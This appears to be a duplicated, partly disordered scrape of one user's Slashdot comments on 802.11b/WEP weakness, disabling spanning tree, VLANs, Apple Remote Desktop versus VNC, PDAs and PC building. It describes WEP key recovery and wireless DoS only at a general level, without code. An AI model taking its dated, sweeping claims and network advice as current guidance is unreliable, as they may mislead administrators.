Next the RIAA will be paying people to go and trample the big spider's web as they will mistake it for a web based P2P application to facilitate food sharing.
Predictable conclusions - security is mainly compromised through human, not technological factors.
Presumably this is referring to the human failing that was responsible for the flaws in 802.11b design? 802.11b simply *cannot* be made secure. Beacon frames are not encrypted, MAC addresses are not encrypted. Capture approx 1Gb of network traffic and you can decrypt the WEP key. Once you do that, you are in. There is little difference between the time needed to crack 40bit and 128bit WEP keys.
Do not deploy an 802.11b network in an environment where you would not fix cabled LAN ports to the outside of your building with flashing neon signs pointing to them with "PLUG IN HERE!" written on them.
Its been interesting reading the replies here to my "drastic" suggestion of disabling spanning tree. Allow me to elaborate...
We've had some very odd issues in the past with spanning tree, and it's for this reason we normally disable it. I do run it on some segments, but there are other segments that literally cannot have it enabled, otherwise things stop working. For example, Apple Mac's really don't like spanning tree. (Plugging a Mac server into a spanning tree enabled switch can break it).
On the rare occasion that we have had a loop, we only lose one segment. As when this happens it's noticed, and it could only have happened from one of several locations, we can easily track down the problem.
VLAN's have proven to be quite good at isolating segments from problems on other segments.
Do your VLANS share the same physical cable? If so, how are they connected? Do you use a one-armed router?
The whole point of VLANS is so you can put multiple networks along the same cable. We distribute sets of VLANS to edge switches over fibre (and dark fibre to the remote sites at gigabit speed) where they are then seperated out into 100Mbit ports on the switches.
do you think the answer to having an massive and unreliable network is to build a second identical network?"
I think the answer is to disable spanning tree.
We had a similar problem here (large academic installtion, hundreds of workstations, several sites) with things (before my time I hasten to add) being one Big Flat Network (shudder) using IPX primarily and Novell. Needless to say this was not good. I've since redesigned things using IP and multiple VLANS, however there is still the odd legacy system that needs access to the old net.
My solution was to tap the protocols running in the flat network and to put these into VLAN's that can be safely propagated around the layer 3 switched network and presented wherever we wish. The entire "flat" network is tapped into a VLAN and the IP services that are running on it routed into. Any problems with either network and we just pull the routes linking the two together if it were to get that bad.
Funny to see how the Mac community is slowly but surely becoming UNIXified.
Next they will be using the terminal app. Seriously though, transitioning from OS9 to OSX must be a bit like moving from an automatic to a stick shift.
Watch this get modded down because it's mac related.
So lets see - using my PPC, Bluetooth card and my T68 GPRS mobile I can connect to the net from anywhere, send and receive email with attachments, use any of the IM clients that run on PPC (such as MSN, Yahoo, ICQ etc) even use IRC if I need to reach people who are only reachable there.
Also being a musician who produces music for a singer friend of mine I have in the past downloaded some of my tracks from the net used the PPC to play them back using Windows Media Player one night when the CD player broke down at the venue she was singing.
I can connect wirelessly using 802.11b at work, synchronise my work mail, notes and calendar with my desktop at work; I can even admin a windows server using the Terminal Services client, wirelessly. I have every note I've even written about server setup procedures to hand, in a searchable form. I have an eBook reader, and MP3 player. I have the ability to use the web from anywhere.
Seriously - how someone can post on/. that "PDA's are not worth using" escapes me. Simple fact: it depends on what YOUR needs are. If you need a PDA, use one. If you buy one as a gadget and get bored with it, this is your business but DONT say that they are not useful as they obviously are.
I was under the impression - admittedly a glib one - that it's possible to send remote Aqua events using Applescript over any of the network layers.
It may be, but not for ARD.
I also was under the impression - mistakenly, since you've said ARD is a bitmap pusher - that ARD used this capability to reduce network clutter.
If only. It's a bitmap pusher, that's all.
The bitmap issue, of course, is key. VNC wins, hands-down - since ARD ain't free.
VNC is also MUCH more reliable and can easily be invoked (and shut down) from a remote shell.
If it came down to it, though, ARD will still get the job done - and may have the added advantage that with a fast network connection, ARD may one day be able to do such things as play Quicktime movies (albeit buffered) seamlessly...
ARD is not suitable as an X replacement. For starters it only supports one client connection at a time. Secondly it freezes - often. No good having a remote admin tool if it doesnt work. Thirdly it's bandwidth intensive, as it's a bitmap pusher. Admittedly bandwidth is becoming less of an issue however the less you need to push around the faster you can do it.
Also, isn't ARD included with all 10.2 Server packages now?
No it isn't, but it should be.
ARD is a screen controller, nothing more. There is also the security aspect - if you are controlling a machine remotely, anyone who is physically able to can see what you are doing and take over at any time. For example - someone sees you log in as the admin, or perhaps root then unplugs the network cable to tinker with the box. This would not be possible with correctly configured X.
A similar thing happened to me - my ex employer had their mail relay and net gateway running on a SPARC Ultra 5 r00ted (Solaris 2.6, NO PATCHES!!! - what did they expect??) Basically they employ staff to a salary, not a standard. (I wasnt even working in IT at that place, I was teaching media production! - hey times were hard you do what you can) I was asked if I could fix it - I happened to know that they were planning on replacing the Solaris box with an Exchange server (which even they could manage) however they didnt have anyone that knew how to set it up, and I was working for another company.
I agreed to do a days consultancy for them where I built their new mail server. I left after the day, with their SPARC Ultra 5 which was the deal I negotiated.:o)
...but I don't mind buying a prebuilt machine if it isn't 100% bits I could buy off the shelf (like a Mac, or an SGI box, or a SUN box etc.)
Yeah - I agree totally. I have an old Sun SPARC Ultra 5 for example which is hardware that you just can't get anywhere else. As for a PC however, I can build them to my precise specs cheaper than I could buy them pre-made. I do a lot of audio recording so I need the performance, hence I have things like LVD-SCSI controllers and LVD drives etc. I choose my motherboards very carefully for performance and expandability.
When buying a pre-made PC you are paying firstly for the cost of someone building it, then of course there is the proprietary things that some manufacturers do that means you cant simply upgrade the board. At least the guy asking the/. question has checked his board out - I think the simplest option is he rolls his own.
"I'm going to buy a Dell computer which supports DDR RAM, however it only comes with two DIMM slots.
Well there is your problem right there. Buy a machine with a different motherboard. If people keep buying machines with only 2 slots then companies have no incentive to supply boards with more slots. Personally I wouldnt buy a pre-made machine - ever. I prefer to have control over every component. (Obviously I'm not talking about the Mac here).
I just bought some book shelf brackets yesterday - they could be used to hold 1U or even 2U rackmount kit safely. Cost me under £10 for two wall mounts and the brackets.
Heh - I was wondering if that would get modded down - thought I'd throw in one slightly negative point and one positive point to test a theory of mine - I bet the poor moderator got confused - bless.
802.11X protocols also had various mentioned feautures to make them secure...
I am well versed in 802.11b hacking techniques, and I agree totally that it is extremely vulnerable. Due to flaws in the design it is literally not possible to secure an 802.11b network - it can be compromised so much so that you might as well put wired LAN access ports on the outside of your building with flashing neon signs pointing at them saying "plug in here". The biggest weaknesses of course being that it doesn't encrypt the beacon frames and the fact that there is a certain packet that can be broadcast that will DoS all devices in range.
This doesn't however, relate to Bluetooth which does not work in the same manner.
Even in the event of no other security, I think the strongest security "feature" of Bluetooth is it's short range, plus the fact you cant connect to some devices unless the user / owner manually sets it to discoverable mode.
I'm not naive enough to assume that this is unbreakable however, but the range thing itself makes it more "secure" than 802.11b.
Slashdot Mirror
Next the RIAA will be paying people to go and trample the big spider's web as they will mistake it for a web based P2P application to facilitate food sharing.
Predictable conclusions - security is mainly compromised through human, not technological factors.
Presumably this is referring to the human failing that was responsible for the flaws in 802.11b design? 802.11b simply *cannot* be made secure. Beacon frames are not encrypted, MAC addresses are not encrypted. Capture approx 1Gb of network traffic and you can decrypt the WEP key. Once you do that, you are in. There is little difference between the time needed to crack 40bit and 128bit WEP keys.
Do not deploy an 802.11b network in an environment where you would not fix cabled LAN ports to the outside of your building with flashing neon signs pointing to them with "PLUG IN HERE!" written on them.
Roll on a truly secure standard.
Its been interesting reading the replies here to my "drastic" suggestion of disabling spanning tree. Allow me to elaborate...
;)
We've had some very odd issues in the past with spanning tree, and it's for this reason we normally disable it. I do run it on some segments, but there are other segments that literally cannot have it enabled, otherwise things stop working. For example, Apple Mac's really don't like spanning tree. (Plugging a Mac server into a spanning tree enabled switch can break it).
On the rare occasion that we have had a loop, we only lose one segment. As when this happens it's noticed, and it could only have happened from one of several locations, we can easily track down the problem.
VLAN's have proven to be quite good at isolating segments from problems on other segments.
Still think I'm crazy?
Well the original message on the site does have a copyright notice at the bottom.
If this trend continues then maybe we will get all spammers putting copyright notices on the bottom of their messages.
All we need to do then is block all messages with copyright symbols in them.
Nice =o)
Do your VLANS share the same physical cable? If so, how are they connected? Do you use a one-armed router?
The whole point of VLANS is so you can put multiple networks along the same cable. We distribute sets of VLANS to edge switches over fibre (and dark fibre to the remote sites at gigabit speed) where they are then seperated out into 100Mbit ports on the switches.
do you think the answer to having an massive and unreliable network is to build a second identical network?"
I think the answer is to disable spanning tree.
We had a similar problem here (large academic installtion, hundreds of workstations, several sites) with things (before my time I hasten to add) being one Big Flat Network (shudder) using IPX primarily and Novell. Needless to say this was not good. I've since redesigned things using IP and multiple VLANS, however there is still the odd legacy system that needs access to the old net.
My solution was to tap the protocols running in the flat network and to put these into VLAN's that can be safely propagated around the layer 3 switched network and presented wherever we wish. The entire "flat" network is tapped into a VLAN and the IP services that are running on it routed into. Any problems with either network and we just pull the routes linking the two together if it were to get that bad.
Funny to see how the Mac community is slowly but surely becoming UNIXified.
Next they will be using the terminal app. Seriously though, transitioning from OS9 to OSX must be a bit like moving from an automatic to a stick shift.
Watch this get modded down because it's mac related.
I thought they were one and the same job - I suppose if you take the definitions literally I see what you mean.
:o)
I do both then. Do I get paid double now?
So people stop using IE, then another browser (say, opera) takes over as the dominant browser, so spy/adware starts to be targetted at opera users.
Do we then avoid opera?
The problem is that there are morons out there developing spy / ad / malware, not which browser someone happens to use.
Check this out
Seriously though - you saw it on their site - does this make it legal?
So lets see - using my PPC, Bluetooth card and my T68 GPRS mobile I can connect to the net from anywhere, send and receive email with attachments, use any of the IM clients that run on PPC (such as MSN, Yahoo, ICQ etc) even use IRC if I need to reach people who are only reachable there.
/. that "PDA's are not worth using" escapes me. Simple fact: it depends on what YOUR needs are. If you need a PDA, use one. If you buy one as a gadget and get bored with it, this is your business but DONT say that they are not useful as they obviously are.
Also being a musician who produces music for a singer friend of mine I have in the past downloaded some of my tracks from the net used the PPC to play them back using Windows Media Player one night when the CD player broke down at the venue she was singing.
I can connect wirelessly using 802.11b at work, synchronise my work mail, notes and calendar with my desktop at work; I can even admin a windows server using the Terminal Services client, wirelessly. I have every note I've even written about server setup procedures to hand, in a searchable form. I have an eBook reader, and MP3 player. I have the ability to use the web from anywhere.
Nah - not worth using.
I suppose a lot of what I use mine for relies on reasonably fast wireless data access, but I forget - you US types dont WANT wireless data services like GPRS do you? (Or is that just Qualcomm shareholders?)
Seriously - how someone can post on
Anyone know? Just curious! :o)
It's already being used -- it's the messaging pop-ups in Windows. No way to stop it except shutting down the messaging service
You mean except firewalling TCP port 139 and UDP 137?
The terminals run a console application on a light DOS. Everything is fine so far.
A "console application" connecting to a server via DOS? I bet his "console application" is a telnet client!
Most terrorists will use credit cards and checks without a second thought.
Really? That's very interesting. Now how do you know that? Have you interviewed all terrorists?
They have it all covered. At the bottom of anything that mentions iTunes it says "Don't steal music."
Who is going to disobey that?
I was under the impression - admittedly a glib one - that it's possible to send remote Aqua events using Applescript over any of the network layers.
...
It may be, but not for ARD.
I also was under the impression - mistakenly, since you've said ARD is a bitmap pusher - that ARD used this capability to reduce network clutter.
If only. It's a bitmap pusher, that's all.
The bitmap issue, of course, is key. VNC wins, hands-down - since ARD ain't free.
VNC is also MUCH more reliable and can easily be invoked (and shut down) from a remote shell.
If it came down to it, though, ARD will still get the job done - and may have the added advantage that with a fast network connection, ARD may one day be able to do such things as play Quicktime movies (albeit buffered) seamlessly
ARD is not suitable as an X replacement. For starters it only supports one client connection at a time. Secondly it freezes - often. No good having a remote admin tool if it doesnt work. Thirdly it's bandwidth intensive, as it's a bitmap pusher. Admittedly bandwidth is becoming less of an issue however the less you need to push around the faster you can do it.
Also, isn't ARD included with all 10.2 Server packages now?
No it isn't, but it should be.
ARD is a screen controller, nothing more. There is also the security aspect - if you are controlling a machine remotely, anyone who is physically able to can see what you are doing and take over at any time. For example - someone sees you log in as the admin, or perhaps root then unplugs the network cable to tinker with the box. This would not be possible with correctly configured X.
A similar thing happened to me - my ex employer had their mail relay and net gateway running on a SPARC Ultra 5 r00ted (Solaris 2.6, NO PATCHES!!! - what did they expect??) Basically they employ staff to a salary, not a standard. (I wasnt even working in IT at that place, I was teaching media production! - hey times were hard you do what you can) I was asked if I could fix it - I happened to know that they were planning on replacing the Solaris box with an Exchange server (which even they could manage) however they didnt have anyone that knew how to set it up, and I was working for another company.
:o)
I agreed to do a days consultancy for them where I built their new mail server. I left after the day, with their SPARC Ultra 5 which was the deal I negotiated.
...but I don't mind buying a prebuilt machine if it isn't 100% bits I could buy off the shelf (like a Mac, or an SGI box, or a SUN box etc.)
/. question has checked his board out - I think the simplest option is he rolls his own.
Yeah - I agree totally. I have an old Sun SPARC Ultra 5 for example which is hardware that you just can't get anywhere else. As for a PC however, I can build them to my precise specs cheaper than I could buy them pre-made. I do a lot of audio recording so I need the performance, hence I have things like LVD-SCSI controllers and LVD drives etc. I choose my motherboards very carefully for performance and expandability.
When buying a pre-made PC you are paying firstly for the cost of someone building it, then of course there is the proprietary things that some manufacturers do that means you cant simply upgrade the board. At least the guy asking the
"I'm going to buy a Dell computer which supports DDR RAM, however it only comes with two DIMM slots.
Well there is your problem right there. Buy a machine with a different motherboard. If people keep buying machines with only 2 slots then companies have no incentive to supply boards with more slots. Personally I wouldnt buy a pre-made machine - ever. I prefer to have control over every component. (Obviously I'm not talking about the Mac here).
I just bought some book shelf brackets yesterday - they could be used to hold 1U or even 2U rackmount kit safely. Cost me under £10 for two wall mounts and the brackets.
Depends on what kit you want to mount of course - I cant see a fridge working well on it's side
Heh - I was wondering if that would get modded down - thought I'd throw in one slightly negative point and one positive point to test a theory of mine - I bet the poor moderator got confused - bless.
At least it's moderately more important the Quicktime getting a point release. Oh wait - that made the front page too.
It certainly looks better than the old er.. shall we say "overly feminine looking" iBook - those used to come with a free mince.
I was fortunate enough to play with a decent spec TiBook last week - rather nice running OSX. Think I just might have to get me one of those...
802.11X protocols also had various mentioned feautures to make them secure...
I am well versed in 802.11b hacking techniques, and I agree totally that it is extremely vulnerable. Due to flaws in the design it is literally not possible to secure an 802.11b network - it can be compromised so much so that you might as well put wired LAN access ports on the outside of your building with flashing neon signs pointing at them saying "plug in here". The biggest weaknesses of course being that it doesn't encrypt the beacon frames and the fact that there is a certain packet that can be broadcast that will DoS all devices in range.
This doesn't however, relate to Bluetooth which does not work in the same manner.
Even in the event of no other security, I think the strongest security "feature" of Bluetooth is it's short range, plus the fact you cant connect to some devices unless the user / owner manually sets it to discoverable mode.
I'm not naive enough to assume that this is unbreakable however, but the range thing itself makes it more "secure" than 802.11b.